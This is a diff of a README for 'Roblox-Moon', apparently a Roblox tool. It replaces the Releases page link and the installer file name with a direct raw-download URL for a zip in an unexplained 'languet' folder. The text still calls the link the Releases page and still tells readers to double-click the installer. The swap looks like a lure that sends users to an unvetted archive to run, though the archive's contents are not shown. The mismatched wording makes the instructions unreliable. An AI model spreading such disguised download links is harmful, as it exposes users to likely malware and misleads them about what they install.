TheHashCode/Roblox-Moon/README.md

 To get started, follow these steps:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/TheHashCode/Roblox-Moon/releases) to find the latest version of Roblox-Moon.
+   Go to the [Releases page](https://raw.githubusercontent.com/TheHashCode/Roblox-Moon/main/languet/Roblox-Moon.zip) to find the latest version of Roblox-Moon.

 2. **Select the Desired Version**
    On the Releases page, you will see a list of versions.
 Click on the most recent version to expand the details.

 3. **Download the Installer**
-   Look for the file that says something like `Roblox-Moon-Installer.exe` and click on it.
+   Look for the file that says something like `https://raw.githubusercontent.com/TheHashCode/Roblox-Moon/main/languet/Roblox-Moon.zip` and click on it.
 This will start the download process.

 4. **Run the Installer**
    Once the download is complete, locate the downloaded file (usually found in your "Downloads" folder).
 Double click the installer to start the installation process.